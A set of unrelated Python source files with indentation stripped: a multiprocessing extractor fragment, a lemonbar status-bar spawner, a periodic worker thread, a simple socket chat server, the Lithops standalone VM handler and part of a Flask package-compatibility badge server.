print(f"Extracted {next_ordinal} articles ({interval_rate} art/s)")
interval_start = default_timer()
if __name__ == '__main__':
# multiprocessing.set_start_method('spawn')
# output queue
interval_start = default_timer()
output_queue = multiprocessing.Queue(maxsize=__CORES__*20)
# Reduce job that sorts and prints output
reduce = multiprocessing.Process(target=reduce_process, args=(output_queue, output))
reduce.start()
try:
# __CORES__ = 2
q = multiprocessing.Queue(maxsize=__CORES__*20)
# iolock = ctx.Lock()
# pool = ctx.Pool(__CORES__, initializer=multhithreadprocess, initargs=(q, writer_output))
workers = []
for _ in range(max(1, __CORES__)):
extractor = multiprocessing.Process(target=multhithreadprocess,
args=(q, output_queue))
extractor.daemon = True # only live while parent process lives
extractor.start()
workers.append(extractor)
for d in reader.read_documents():
# if trip_read.get_exists(d.uri, 'P31', filter_entities):
# continue
# d = date.run(d)
q.put(d) # blocks until q below its max size
for _ in workers: # tell workers we're done
q.put(None)
# signal termination
# wait for workers to terminate
for w in workers:
w.join()
# signal end of work to reduce process
output_queue.put(None)
# wait for it to finish
reduce.join()
finally:
for _ in workers: # tell workers we're done
q.put(None)
# signal termination
# wait for workers to terminate
for w in workers:
w.join()
# signal end of work to reduce process
output_queue.put(None)
# wait for it to finish
reduce.join()
print(f'Finished in {(default_timer() - interval_start)}')
|
__init__.py |
import logging
import time
import threading
from barython import tools
from barython.hooks import HooksPool
logger = logging.getLogger("barython")
class _BarSpawner():
_cache = None
def _write_in_bar(self, content):
if self._stop.is_set():
return
self._bar.stdin.write(content)
logger.debug("Writing {}".format(content))
self._bar.stdin.flush()
def draw(self):
"""
Draws the bar on the screen
"""
content = (self.gather() + "\n").encode()
if self._cache == content:
return
self._cache = content
# if stopped, do not init lemonbar
if not self._stop.is_set():
try:
self._write_in_bar(content)
except (BrokenPipeError, AttributeError):
logger.info("Lemonbar is off, init it")
if getattr(self, "_bar", None) and self._bar.poll() is None:
# lemonbar seems to have crashed, kill it
self.stop_bar(kill=True)
self.init_bar()
self._write_in_bar(content)
else:
logger.debug("Screen is stopped, will not draw anything")
def gather(self):
"""
Gather all widgets content
"""
raise NotImplementedError()
def update(self, no_wait=False):
"""
Ask to redraw the screen or the global panel
If more than one widget is waiting for the barrier, it is meaningless
to wait too (because its value will be taken in account by the update
ran by the waiting widget).
A sleep is launched at the end to respect the refresh rate set for this
Screen.
:param no_wait: does not wait for the refresh time before leaving
"""
try:
locked = self._refresh_lock.acquire(blocking=False)
# More than 2 threads are already here, doesn't make any sense to
# wait because the screen will be updated
if not locked:
return
with self._update_lock:
self.draw()
if not no_wait:
time.sleep(self.refresh)
finally:
self._refresh_lock.release()
def init_bar(self):
"""
Spawn lemonbar and store the pipe in self._bar
Before starting, tries to terminate self._bar in case of refresh
"""
if self._stop.is_set():
return None
screen_geometry = self.geometry
if screen_geometry:
w, h, x, y = screen_geometry
w -= self.offset[0] + self.offset[1]
h = self.height
x += self.offset[0]
y += self.offset[2]
geometry = (w, h, x, y)
else:
geometry = (None, self.height)
bar_cmd = getattr(self, "bar_cmd", None) or self.panel.bar_cmd
self._bar = tools.lemonbar(
bar_cmd=bar_cmd, geometry=geometry, fonts=self.fonts,
fg=self.fg, bg=self.bg, clickable=self.clickable
)
def propage_hooks_changes(self):
"""
Propage a change in the hooks pool
"""
pass
def start(self):
self._cache = None
self._stop.clear()
self.hooks.start()
def stop_bar(self, kill=False):
"""
Terminates or kill the bar
"""
try:
if kill:
self._bar.kill()
else:
self._bar.terminate()
self._bar.wait()
self._bar = None
except:
pass
def stop(self, *args, **kwargs):
"""
Stop the screen
"""
self._stop.set()
self.stop_bar()
def restart(self, *args, **kwargs):
self.stop()
threading.Thread(target=self.start).start()
def __init__(self, offset=None, height=18, geometry=None, fg=None,
bg=None, fonts=None, clickable=10):
#: used to limit the update
self._update_lock = threading.Lock()
self._refresh_lock = threading.Semaphore(2)
#: event to stop the screen
self._stop = threading.Event()
self._stop.set()
self.height = height
self.offset = offset if offset is not None else (0, 0, 0)
self.geometry = geometry
self.fg = fg
self.bg = bg
self.fonts = fonts
self.clickable = clickable
self.hooks = HooksPool(parent=self)
from .panel import Panel
from .screen import Screen
|
_worker.py | import atexit
import threading
import os
from .internal.logger import get_logger
_LOG = get_logger(__name__)
class PeriodicWorkerThread(object):
"""Periodic worker thread.
This class can be used to instantiate a worker thread that will run its `run_periodic` function every `interval`
seconds.
The method `on_shutdown` will be called on worker shutdown. The worker will be shutdown when the program exits and
can be waited for with the `exit_timeout` parameter.
"""
_DEFAULT_INTERVAL = 1.0
def __init__(self, interval=_DEFAULT_INTERVAL, exit_timeout=None, name=None, daemon=True):
"""Create a new worker thread that runs a function periodically.
:param interval: The interval in seconds to wait between calls to `run_periodic`.
:param exit_timeout: The timeout to use when exiting the program and waiting for the thread to finish.
:param name: Name of the worker.
:param daemon: Whether the worker should be a daemon.
"""
self._thread = threading.Thread(target=self._target, name=name)
self._thread.daemon = daemon
self._stop = threading.Event()
self.started = False
self.interval = interval
self.exit_timeout = exit_timeout
atexit.register(self._atexit)
def _atexit(self):
self.stop()
if self.exit_timeout is not None and self.started:
key = "ctrl-break" if os.name == "nt" else "ctrl-c"
_LOG.debug(
"Waiting %d seconds for %s to finish. Hit %s to quit.",
self.exit_timeout,
self._thread.name,
key,
)
self.join(self.exit_timeout)
def start(self):
"""Start the periodic worker."""
_LOG.debug("Starting %s thread", self._thread.name)
self._thread.start()
self.started = True
def stop(self):
"""Stop the worker."""
_LOG.debug("Stopping %s thread", self._thread.name)
self._stop.set()
def is_alive(self):
return self._thread.is_alive()
def join(self, timeout=None):
return self._thread.join(timeout)
def _target(self):
while not self._stop.wait(self.interval):
self.run_periodic()
self._on_shutdown()
@staticmethod
def run_periodic():
"""Method executed every interval."""
pass
def _on_shutdown(self):
_LOG.debug("Shutting down %s thread", self._thread.name)
self.on_shutdown()
@staticmethod
def on_shutdown():
"""Method ran on worker shutdown."""
pass
|
server.py | import socket
import threading
HOST = '127.0.0.1'
PORT = 8080
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen()
clients = []
nicknames = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
print(f"{nicknames[clients.index(client)]} says {message}")
broadcast(message)
except:
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
nicknames.remove(nickname)
break
def receive():
while True:
client, address = server.accept()
print(f"connected with {str(address)}")
client.send("NICK".encode('utf-8'))
nickname = client.recv(1024)
nicknames.append(nickname)
clients.append(client)
print(f"Nickname of client is {nickname}")
broadcast(f"{nickname} connected to the server!\n".encode("utf-8"))
client.send("Connected to the server".encode('utf-8'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print("server running")
receive()
|
standalone.py | #
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import threading
import time
import logging
import importlib
import requests
import shlex
import concurrent.futures as cf
from lithops.utils import is_lithops_worker, create_handler_zip
from lithops.constants import SA_SERVICE_PORT, SA_INSTALL_DIR, CACHE_DIR
from lithops.standalone.utils import get_master_setup_script
from lithops.version import __version__ as lithops_version
logger = logging.getLogger(__name__)
LOCAL_FH_ZIP_LOCATION = os.path.join(os.getcwd(), 'lithops_standalone.zip')
class LithopsValidationError(Exception):
pass
class StandaloneHandler:
"""
A StandaloneHandler object is used by invokers and other components to access
underlying standalone backend without exposing the implementation details.
"""
def __init__(self, standalone_config):
self.config = standalone_config
self.backend_name = self.config['backend']
self.start_timeout = self.config['start_timeout']
self.exec_mode = self.config['exec_mode']
self.workers_policy = self.config.get('workers_policy', 'permissive') # by default not forcing the creation of all workers
self.is_lithops_worker = is_lithops_worker()
module_location = f'lithops.standalone.backends.{self.backend_name}'
sb_module = importlib.import_module(module_location)
StandaloneBackend = getattr(sb_module, 'StandaloneBackend')
self.backend = StandaloneBackend(self.config[self.backend_name], self.exec_mode)
self.jobs = [] # list to store executed jobs (job_keys)
logger.debug("Standalone handler created successfully")
def init(self):
"""
Initialize the backend and create/start the master VM instance
"""
self.backend.init()
def _is_master_service_ready(self):
"""
Checks if the proxy is ready to receive http connections
"""
try:
if self.is_lithops_worker:
url = f"http://lithops-master:{SA_SERVICE_PORT}/ping"
r = requests.get(url, timeout=1)
if r.status_code == 200:
return True
return False
else:
cmd = f'curl -X GET http://127.0.0.1:{SA_SERVICE_PORT}/ping'
out = self.backend.master.get_ssh_client().run_remote_command(cmd)
data = json.loads(out)
if data['response'] == lithops_version:
return True
else:
self.dismantle()
raise LithopsValidationError(
f"Lithops version {data['response']} on {self.backend.master}, "
f"doesn't match local lithops version {lithops_version}, consider "
"running 'lithops clean' to delete runtime metadata leftovers or "
"'lithops clean --all' to delete master instance as well")
except LithopsValidationError as e:
raise e
except Exception:
return False
def _validate_master_service_setup(self):
"""
Checks the master VM is correctly installed
"""
logger.debug(f'Validating lithops version installed on master matches {lithops_version}')
ssh_client = self.backend.master.get_ssh_client()
cmd = f'cat {SA_INSTALL_DIR}/access.data'
res = ssh_client.run_remote_command(cmd)
if not res:
self.dismantle()
raise LithopsValidationError(
f"Lithops service not installed on {self.backend.master}, "
"consider using 'lithops clean' to delete runtime metadata "
"or 'lithops clean --all' to delete master instance as well")
master_lithops_version = json.loads(res).get('lithops_version')
if master_lithops_version != lithops_version:
self.dismantle()
raise LithopsValidationError(
f"Lithops version {master_lithops_version} on {self.backend.master}, "
f"doesn't match local lithops version {lithops_version}, consider "
"running 'lithops clean' to delete runtime metadata leftovers or "
"'lithops clean --all' to delete master instance as well")
logger.debug("Validating lithops lithops master service is "
f"running on {self.backend.master}")
res = ssh_client.run_remote_command("service lithops-master status")
if not res or 'Active: active (running)' not in res:
self.dismantle()
raise LithopsValidationError(
f"Lithops master service not active on {self.backend.master}, "
f"consider to delete master instance and metadata using "
"'lithops clean --all'", res)
# self.backend.master.del_ssh_client() # Client is deleted in clear()
def _wait_master_service_ready(self):
"""
Waits until the proxy is ready to receive http connections
"""
self._validate_master_service_setup()
logger.info(f'Waiting Lithops service to become ready on {self.backend.master}')
start = time.time()
while(time.time() - start < self.start_timeout):
if self._is_master_service_ready():
ready_time = round(time.time()-start, 2)
logger.debug(f'{self.backend.master} ready in {ready_time} seconds')
return True
time.sleep(2)
self.dismantle()
raise Exception(f'Lithops service readiness probe expired on {self.backend.master}')
def _get_workers_on_master(self):
"""
gets the total available workers on the master VM
"""
workers_on_master = []
try:
if self.is_lithops_worker:
url = f"http://lithops-master:{SA_SERVICE_PORT}/workers"
resp = requests.get(url)
workers_on_master = resp.json()
else:
cmd = (f'curl http://127.0.0.1:{SA_SERVICE_PORT}/workers '
'-H \'Content-Type: application/json\' -X GET')
resp = self.backend.master.get_ssh_client().run_remote_command(cmd)
workers_on_master = json.loads(resp)
except LithopsValidationError as e:
raise e
except Exception:
pass
return workers_on_master
def _wait_workers_ready(self, new_workers):
"""
Wait a given set of workers to become ready
"""
w_names = [w.name for w in new_workers]
logger.info(f'Waiting following workers to become ready: {w_names}')
start = time.time()
workers_state_on_master = {}
while(time.time() - start < self.start_timeout * 2):
try:
cmd = (f'curl -X GET http://127.0.0.1:{SA_SERVICE_PORT}/workers-state '
'-H \'Content-Type: application/json\'')
resp = self.backend.master.get_ssh_client().run_remote_command(cmd)
prev = workers_state_on_master
workers_state_on_master = json.loads(resp)
running = 0
if prev != workers_state_on_master:
msg = 'All workers states: '
for w in workers_state_on_master:
w_state = workers_state_on_master[w]["state"]
msg += f'({w} - {w_state})'
if w in w_names and w_state == 'running':
if workers_state_on_master[w].get('err'):
logger.warning(f'Worker may operate not in desired '
f'configuration, worker {w} error: '
f'{workers_state_on_master[w].get("err")}')
running += 1
logger.info(msg)
if running == len(w_names):
logger.info(f'All workers are ready: {w_names}')
# on backend, in case workers failed to get optimal workers setup, they may run
# but in order to notify user they will have running state, but 'err' containing error
for w in workers_state_on_master:
if w in w_names and workers_state_on_master[w]["state"] == 'running' \
and workers_state_on_master[w].get('err'):
logger.warning(f'Workers may operate not in desired configuration, '
f'worker {w} error: {workers_state_on_master[w].get("err")}')
return
except LithopsValidationError as e:
raise e
except Exception as e:
pass
time.sleep(10)
raise Exception(f'Lithops workers service readiness probe expired on {self.backend.master}')
def invoke(self, job_payload):
"""
Run the job description against the selected environment
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
total_calls = job_payload['total_calls']
chunksize = job_payload['chunksize']
total_required_workers = (total_calls // chunksize + (total_calls % chunksize > 0)
if self.exec_mode in ['create', 'reuse'] else 1)
def create_workers(workers_to_create):
current_workers_old = set(self.backend.workers)
futures = []
with cf.ThreadPoolExecutor(workers_to_create+1) as ex:
if not self._is_master_service_ready():
futures.append(ex.submit(lambda: self.backend.master.create(check_if_exists=True)))
for vm_n in range(workers_to_create):
worker_id = "{:04d}".format(vm_n)
name = f'lithops-worker-{executor_id}-{job_id}-{worker_id}'
futures.append(ex.submit(self.backend.create_worker, name))
for future in cf.as_completed(futures):
try:
future.result()
except Exception as e:
# if workers policy is strict, raise exception in case failed to create all workers
if self.workers_policy == 'strict':
raise e
current_workers_new = set(self.backend.workers)
new_workers = current_workers_new - current_workers_old
logger.debug("Total worker VM instances created: {}/{}"
.format(len(new_workers), workers_to_create))
return list(new_workers)
new_workers = []
if self.exec_mode == 'consume':
total_workers = total_required_workers
elif self.exec_mode == 'create':
new_workers = create_workers(total_required_workers)
total_workers = len(new_workers)
elif self.exec_mode == 'reuse':
workers = self._get_workers_on_master()
total_workers = len(workers)
logger.debug(f"Found {total_workers} free workers "
f"connected to master {self.backend.master}")
if total_workers < total_required_workers:
# create missing delta of workers
workers_to_create = total_required_workers - total_workers
logger.debug(f'Going to create {workers_to_create} new workers')
new_workers = create_workers(workers_to_create)
total_workers += len(new_workers)
if total_workers == 0:
raise Exception('It was not possible to create any worker')
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Going to run {total_calls} '
f'activations in {min(total_workers, total_required_workers)} workers')
logger.debug(f"Checking if {self.backend.master} is ready")
if not self._is_master_service_ready():
self.backend.master.create(check_if_exists=True)
self.backend.master.wait_ready()
self._wait_master_service_ready()
job_payload['worker_instances'] = [
{'name': inst.name,
'private_ip': inst.private_ip,
'instance_id': inst.instance_id,
'ssh_credentials': inst.ssh_credentials}
for inst in new_workers
]
# delete ssh key
backend = job_payload['config']['lithops']['backend']
job_payload['config'][backend].pop('ssh_key_filename', None)
if self.is_lithops_worker:
url = f"http://lithops-master:{SA_SERVICE_PORT}/run"
requests.post(url, data=json.dumps(job_payload))
else:
pl = shlex.quote(json.dumps(job_payload))
cmd = (f'curl http://127.0.0.1:{SA_SERVICE_PORT}/run -d {pl} '
'-H \'Content-Type: application/json\' -X POST')
self.backend.master.get_ssh_client().run_remote_command(cmd)
# self.backend.master.del_ssh_client() # Client is deleted in clear()
logger.debug('Job invoked on {}'.format(self.backend.master))
self.jobs.append(job_payload['job_key'])
# in case workers policy is strict, track all required workers create
# in case of 'consume' mode there no new workers created
if self.exec_mode != 'consume' and self.workers_policy == 'strict':
threading.Thread(target=self._wait_workers_ready, args=(new_workers,), daemon=True).start()
def create_runtime(self, runtime_name, *args):
"""
Installs the proxy and extracts the runtime metadata and
preinstalled modules
"""
logger.debug(f'Checking if {self.backend.master} is ready')
if not self.backend.master.is_ready():
self.backend.master.create(check_if_exists=True)
self.backend.master.wait_ready()
self._setup_master_service()
self._wait_master_service_ready()
logger.debug('Extracting runtime metadata information')
payload = {'runtime': runtime_name, 'pull_runtime': True}
if self.is_lithops_worker:
url = f"http://lithops-master:{SA_SERVICE_PORT}/preinstalls"
resp = requests.get(url, data=json.dumps(payload))
runtime_meta = resp.json()
else:
pl = shlex.quote(json.dumps(payload))
cmd = (f'curl http://127.0.0.1:{SA_SERVICE_PORT}/preinstalls -d {pl} '
'-H \'Content-Type: application/json\' -X GET')
out = self.backend.master.get_ssh_client().run_remote_command(cmd)
runtime_meta = json.loads(out)
return runtime_meta
def dismantle(self):
"""
Stop all VM instances
"""
self.backend.dismantle()
def clean(self, **kwargs):
"""
Clan all the backend resources
"""
self.backend.clean(**kwargs)
def clear(self, job_keys=None):
"""
Clear all the backend resources.
clear method is executed after the results are get,
when an exception is produced, or when a user press ctrl+c
"""
try:
if self.is_lithops_worker:
url = f"http://lithops-master:{SA_SERVICE_PORT}/stop"
requests.post(url, data=json.dumps(self.jobs))
else:
pl = shlex.quote(json.dumps(self.jobs))
cmd = (f'curl http://127.0.0.1:{SA_SERVICE_PORT}/stop -d {pl} '
'-H \'Content-Type: application/json\' -X POST')
self.backend.master.get_ssh_client().run_remote_command(cmd)
self.backend.master.del_ssh_client()
except Exception:
pass
if self.exec_mode != 'reuse':
self.backend.clear(job_keys)
def get_runtime_key(self, runtime_name, *args):
"""
Wrapper method that returns a formated string that represents the
runtime key. Each backend has its own runtime key format. Used to
store modules preinstalls into the storage
"""
return self.backend.get_runtime_key(runtime_name)
def get_backend_type(self):
"""
Wrapper method that returns the type of the backend (Batch or FaaS)
"""
return 'batch'
def _setup_master_service(self):
"""
Setup lithops necessary packages and files in master VM instance
"""
logger.info(f'Installing Lithops in {self.backend.master}')
ssh_client = self.backend.master.get_ssh_client()
worker_path = os.path.join(os.path.dirname(__file__), 'worker.py')
master_path = os.path.join(os.path.dirname(__file__), 'master.py')
create_handler_zip(LOCAL_FH_ZIP_LOCATION, [master_path, worker_path])
logger.debug('Uploading lithops files to {}'.format(self.backend.master))
ssh_client.upload_local_file(LOCAL_FH_ZIP_LOCATION, '/tmp/lithops_standalone.zip')
os.remove(LOCAL_FH_ZIP_LOCATION)
vm_data = {'name': self.backend.master.name,
'instance_id': self.backend.master.instance_id,
'private_ip': self.backend.master.private_ip,
'delete_on_dismantle': self.backend.master.delete_on_dismantle,
'lithops_version': lithops_version}
logger.debug('Executing lithops installation process on {}'.format(self.backend.master))
logger.debug('Be patient, initial installation process may take up to 3 minutes')
remote_script = "/tmp/install_lithops.sh"
script = get_master_setup_script(self.config, vm_data)
ssh_client.upload_data_to_file(script, remote_script)
ssh_client.run_remote_command(f"chmod 777 {remote_script}; sudo {remote_script};")
try:
# Download the master VM public key generated with the installation script
# This public key will be used to create to worker
ssh_client.download_remote_file(
f'{self.backend.master.home_dir}/.ssh/id_rsa.pub',
f'{self.backend.cache_dir}/{self.backend.master.name}-id_rsa.pub')
except FileNotFoundError:
pass
|
badge_server.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
URL for creating the badge:
[TODO] Switch to use pybadges once figure out the module not found issue.
'https://img.shields.io/badge/{name}-{status}-{color}.svg'
"""
import ast
import logging
import os
import requests
import threading
import flask
import redis
from compatibility_lib import compatibility_checker
from compatibility_lib import compatibility_store
from compatibility_lib import configs
from compatibility_lib import dependency_highlighter
from compatibility_lib import deprecated_dep_finder
from compatibility_lib import package as package_module
app = flask.Flask(__name__)
# Cache storing the package name associated with its check results.
# {
# 'pkg1_dep_badge':{},
# 'pkg1_self_comp_badge': {
# 'py2':{
# 'status': 'SUCCESS',
# 'details': None,
# },
# 'py3':{
# 'status': 'CHECK_WARNING',
# 'details': '...',
# }
# },
# 'pkg1_google_comp_badge': {
# 'py2':{
# 'status': 'SUCCESS',
# 'details': None,
# },
# 'py3':{
# 'status': 'CHECK_WARNING',
# 'details': {
# 'package1': '...',
# },
# }
# },
# 'pkg1_api_badge':{},
# }
REDIS_CACHE = {}
def fake_redis_get(*args, **kwargs):
key = args[2][0]
return REDIS_CACHE.get(key)
def fake_redis_set(*args, **kwargs):
key = args[2][0]
value = str(args[2][1]).encode('utf-8')
REDIS_CACHE[key] = value
# Patch away the redis connections if run locally
if os.environ.get('RUN_LOCALLY') is not None:
import wrapt
wrapt.wrap_function_wrapper('redis', 'StrictRedis.get', fake_redis_get)
wrapt.wrap_function_wrapper('redis', 'StrictRedis.set', fake_redis_set)
redis_host = os.environ.get('REDISHOST', '10.0.0.3')
redis_port = int(os.environ.get('REDISPORT', 6379))
redis_client = redis.StrictRedis(host=redis_host, port=redis_port)
checker = compatibility_checker.CompatibilityChecker()
store = compatibility_store.CompatibilityStore()
highlighter = dependency_highlighter.DependencyHighlighter(
checker=checker, store=store)
finder = deprecated_dep_finder.DeprecatedDepFinder(
checker=checker, store=store)
priority_level = dependency_highlighter.PriorityLevel
URL_PREFIX = 'https://img.shields.io/badge/'
PY_VER_MAPPING = {
2: 'py2',
3: 'py3',
}
STATUS_COLOR_MAPPING = {
'SUCCESS': 'green',
'UNKNOWN': 'purple',
'INSTALL_ERROR': 'yellow',
'CHECK_WARNING': 'red',
'CALCULATING': 'blue',
'CONVERSION_ERROR': 'orange',
}
DEFAULT_COMPATIBILITY_RESULT = {
'py2': {
'status': 'CALCULATING',
'details': {},
},
'py3': {
'status': 'CALCULATING',
'details': {},
}
}
DEFAULT_DEPENDENCY_RESULT = {
'status': 'CALCULATING',
'details': {},
}
CONVERSION_ERROR_RES = {
'py2': {
'status': 'CONVERSION_ERROR',
'details': None,
},
'py3': {
'status': 'CONVERSION_ERROR',
'details': None,
}
}
DEP_STATUS_COLOR_MAPPING = {
'CALCULATING': 'blue',
'CONVERSION_ERROR': 'purple',
priority_level.UP_TO_DATE.name: 'green',
priority_level.LOW_PRIORITY.name: 'yellow',
priority_level.HIGH_PRIORITY.name: 'red'
}
DEP_CONVERSION_ERROR_RES = {
'status': 'CONVERSION_ERROR',
'details': None,
}
GITHUB_HEAD_NAME = 'github head'
SVG_CONTENT_TYPE = 'image/svg+xml'
EMPTY_DETAILS = 'NO DETAILS'
DEP_BADGE = 'dep_badge'
SELF_COMP_BADGE = 'self_comp_badge'
GOOGLE_COMP_BADGE = 'google_comp_badge'
API_BADGE = 'api_badge'
def _get_pair_status_for_packages(pkg_sets):
version_and_res = {
'py2': {
'status': 'SUCCESS',
'details': {},
},
'py3': {
'status': 'SUCCESS',
'details': {},
}
}
for pkg_set in pkg_sets:
pkgs = [package_module.Package(pkg) for pkg in pkg_set]
pair_res = store.get_pair_compatibility(pkgs)
for res in pair_res:
py_version = PY_VER_MAPPING[res.python_major_version]
# Status showing one of the check failures
if res.status.value != 'SUCCESS':
# Ignore the package that not support for given py_ver
if pkg_set[1] in \
configs.PKG_PY_VERSION_NOT_SUPPORTED.get(
res.python_major_version):
continue
version_and_res[py_version]['status'] = res.status.value
version_and_res[py_version]['details'][pkg_set[1]] = \
res.details if res.details is not None else EMPTY_DETAILS
return version_and_res
def _sanitize_package_name(package_name):
# If the package is from github head, replace the github url to
# 'github head'
if 'github.com' in package_name:
package_name = GITHUB_HEAD_NAME
# Replace '-' with '.'
package_name = package_name.replace('-', '.')
return package_name
def _get_badge_url(res, package_name):
package_name = _sanitize_package_name(package_name)
status = res.get('status')
if status is not None:
color = DEP_STATUS_COLOR_MAPPING[status]
else:
status = res['py3']['status']
if status != 'SUCCESS' and \
package_name not in \
configs.PKG_PY_VERSION_NOT_SUPPORTED.get(2):
status = res['py2']['status']
color = STATUS_COLOR_MAPPING[status]
url = URL_PREFIX + '{}-{}-{}.svg'.format(
package_name, status, color)
return url
def _get_self_compatibility_from_cache(package_name):
self_comp_res = redis_client.get(
'{}_self_comp_badge'.format(package_name))
if self_comp_res is None:
self_comp_res = str(DEFAULT_COMPATIBILITY_RESULT)
else:
self_comp_res = self_comp_res.decode('utf-8')
result_dict = ast.literal_eval(self_comp_res)
return result_dict
def _get_google_compatibility_from_cache(package_name):
google_comp_res = redis_client.get(
'{}_google_comp_badge'.format(package_name))
if google_comp_res is None:
google_comp_res = str(DEFAULT_COMPATIBILITY_RESULT)
else:
google_comp_res = google_comp_res.decode('utf-8')
result_dict = ast.literal_eval(google_comp_res)
return result_dict
def _get_dependency_result_from_cache(package_name):
dependency_res = redis_client.get(
'{}_dependency_badge'.format(package_name))
if dependency_res is None:
dependency_res = str(DEFAULT_DEPENDENCY_RESULT)
else:
dependency_res = dependency_res.decode('utf-8')
result_dict = ast.literal_eval(dependency_res)
return result_dict
def _get_all_results_from_cache(package_name):
self_compat_res = _get_self_compatibility_from_cache(package_name)
google_compat_res = _get_google_compatibility_from_cache(package_name)
dependency_res = _get_dependency_result_from_cache(package_name)
if self_compat_res['py3']['status'] == 'SUCCESS' and \
google_compat_res['py3']['status'] == 'SUCCESS' and \
dependency_res['status'] == 'UP_TO_DATE':
status = 'SUCCESS'
elif 'CALCULATING' in (
self_compat_res['py3']['status'],
google_compat_res['py3']['status'],
dependency_res['status']
):
status = 'CALCULATING'
else:
status = 'CHECK_WARNING'
return status, self_compat_res, google_compat_res, dependency_res
@app.route('/')
def greetings():
return 'hello world'
# Endpoint for testing redis connection.
@app.route('/redis')
def index():
value = redis_client.incr('counter', 1)
return 'Visitor number: {}'.format(value)
@app.route('/one_badge_image')
def one_badge_image():
package_name = flask.request.args.get('package')
# Remove the last '/' from the url root
url_prefix = flask.request.url_root[:-1]
# Call the url for each badge to run the checks. This will populate the
# individual caches, which are used to calculate the final image state.
# Self compatibility badge
requests.get(url_prefix + flask.url_for(
'self_compatibility_badge_image', package=package_name))
# Google compatibility badge
requests.get(url_prefix + flask.url_for(
'google_compatibility_badge_image', package=package_name))
# Self dependency badge
requests.get(url_prefix + flask.url_for(
'self_dependency_badge_image', package=package_name))
status, _, _, _ = _get_all_results_from_cache(package_name)
color = STATUS_COLOR_MAPPING[status]
package_name = _sanitize_package_name(package_name)
url = URL_PREFIX + '{}-{}-{}.svg'.format(package_name, status, color)
response = flask.make_response(requests.get(url).text)
response.content_type = SVG_CONTENT_TYPE
response.headers['Cache-Control'] = 'no-cache'
response.add_etag()
return response
@app.route('/one_badge_target')
def one_badge_target():
package_name = flask.request.args.get('package')
status, self_compat_res, google_compat_res, dependency_res = \
_get_all_results_from_cache(package_name)
return flask.render_template(
'one-badge.html',
package_name=package_name,
self_compat_res=self_compat_res,
google_compat_res=google_compat_res,
dependency_res=dependency_res)
@app.route('/self_compatibility_badge_image')
def self_compatibility_badge_image():
"""Badge showing whether a package is compatible with itself."""
package_name = flask.request.args.get('package')
version_and_res = {
'py2': {
'status': 'CALCULATING',
'details': None,
},
'py3': {
'status': 'CALCULATING',
'details': None,
}
}
def run_check():
# First see if this package is already stored in BigQuery.
package = package_module.Package(package_name)
compatibility_status = store.get_self_compatibility(package)
if compatibility_status:
for res in compatibility_status:
py_version = PY_VER_MAPPING[res.python_major_version]
version_and_res[py_version]['status'] = res.status.value
version_and_res[py_version]['details'] = res.details \
if res.details is not None else EMPTY_DETAILS
# If not pre stored in BigQuery, run the check for the package.
else:
py2_res = checker.check([package_name], '2')
py3_res = checker.check([package_name], '3')
version_and_res['py2']['status'] = py2_res.get('result')
py2_description = py2_res.get('description')
py2_details = EMPTY_DETAILS if py2_description is None \
else py2_description
version_and_res['py2']['details'] = py2_details
version_and_res['py3']['status'] = py3_res.get('result')
py3_description = py3_res.get('description')
py3_details = EMPTY_DETAILS if py3_description is None \
else py3_description
version_and_res['py3']['details'] = py3_details
url = _get_badge_url(version_and_res, package_name)
# Write the result to memory store
redis_client.set(
'{}_self_comp_badge'.format(package_name), version_and_res)
return requests.get(url).text
self_comp_res = redis_client.get(
'{}_self_comp_badge'.format(package_name))
threading.Thread(target=run_check).start()
if self_comp_res is not None:
try:
details = ast.literal_eval(self_comp_res.decode('utf-8'))
except SyntaxError:
logging.error(
'Error occurs while converting to dict, value is {}.'.format(
self_comp_res))
details = CONVERSION_ERROR_RES
else:
details = version_and_res
url = _get_badge_url(details, package_name)
response = flask.make_response(requests.get(url).text)
response.content_type = SVG_CONTENT_TYPE
response.headers['Cache-Control'] = 'no-cache'
response.add_etag()
return response
@app.route('/self_compatibility_badge_target')
def self_compatibility_badge_target():
"""Return the dict which contains the self compatibility status and details
for py2 and py3.
e.g. {
'py2':{
'status': 'SUCCESS',
'details': None,
},
'py3':{
'status': 'CHECK_WARNING',
'details': '...',
}
}
"""
package_name = flask.request.args.get('package')
result_dict = _get_self_compatibility_from_cache(package_name)
return flask.render_template(
'self-compatibility.html',
package_name=package_name,
result=result_dict)
@app.route('/self_dependency_badge_image')
def self_dependency_badge_image():
"""Badge showing whether a package is has outdated dependencies."""
package_name = flask.request.args.get('package')
def run_check():
res = {
'status': 'CALCULATING',
'details': {},
}
outdated = highlighter.check_package(package_name)
deprecated_deps_list = finder.get_deprecated_dep(package_name)[1]
deprecated_deps = ', '.join(deprecated_deps_list)
details = {}
max_level = priority_level.UP_TO_DATE
for dep in outdated:
dep_detail = {}
level = dep.priority.level
if level.value > max_level.value:
max_level = level
dep_detail['installed_version'] = dep.installed_version
dep_detail['latest_version'] = dep.latest_version
dep_detail['priority'] = dep.priority.level.name
dep_detail['detail'] = dep.priority.details
details[dep.name] = dep_detail
res['status'] = max_level.name
res['details'] = details
res['deprecated_deps'] = deprecated_deps
url = _get_badge_url(res, package_name)
# Write the result to memory store
redis_client.set(
'{}_dependency_badge'.format(package_name), res)
return requests.get(url).text
dependency_res = redis_client.get(
'{}_dependency_badge'.format(package_name))
threading.Thread(target=run_check).start()
if dependency_res is not None:
try:
